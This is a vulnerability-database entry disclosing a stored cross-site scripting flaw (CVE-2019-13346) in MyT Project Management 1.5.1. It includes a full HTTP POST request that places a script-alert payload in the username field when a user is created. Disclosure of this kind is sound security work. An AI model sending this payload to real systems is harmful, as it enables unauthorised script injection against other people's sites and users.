Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
MyT Project Management 1.5.1 User[username] Persistent Cross-Site Scripting
2019.07.24
Credit:
Metin Yunus Kandemir (kandemir)
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2019-13346
CWE:
CWE-79
CVSS Base Score:
4.3/10
Impact Subscore:
2.9/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
None
Integrity impact:
Partial
Availability impact:
None
# Exploit Title: MyT Project Management - User[username] Stored Cross Site Scripting # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://manageyourteam.net/index.html # Software Link: https://sourceforge.net/projects/myt/files/latest/download # Version: 1.5.1 # Category: Webapps # Tested on: Xampp for Windows # Software Description : MyT is an extremely powerful project management tool, and it's easy to use for both administrators and end-users with a really intuitive structure. # CVE : CVE-2019-13346 ================================================================== #Description: "User[username]" parameter has a xss vulnerability. Malicious code is being written to database while user is creating process. #to exploit vulnerability,add user that setting username as "<sCript>alert("XSS")</sCript>" malicious code. POST /myt-1.5.1/user/create HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target/myt-1.5.1/user/create Content-Type: multipart/form-data; boundary=---------------------------1016442643560510919154680312 Content-Length: 3921 Cookie: PHPSESSID=bp16alfk843c4qll0ejq302b2j Connection: close Upgrade-Insecure-Requests: 1 -----------------------------1016442643560510919154680312 Content-Disposition: form-data; name="User[username]" <sCript>alert("XSS")</sCript> -----------------------------1016442643560510919154680312 Content-Disposition: form-data; name="User[password]" 12345 -----------------------------1016442643560510919154680312 Content-Disposition: form-data; name="User[password_confirm]" 12345 -----------------------------1016442643560510919154680312 Content-Disposition: form-data; name="User[email]" ad1@gmail.com -----------------------------1016442643560510919154680312 Content-Disposition: form-data; name="User[name]" -----------------------------1016442643560510919154680312 Content-Disposition: form-data; name="User[surname]" . ..snip ..snip .
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top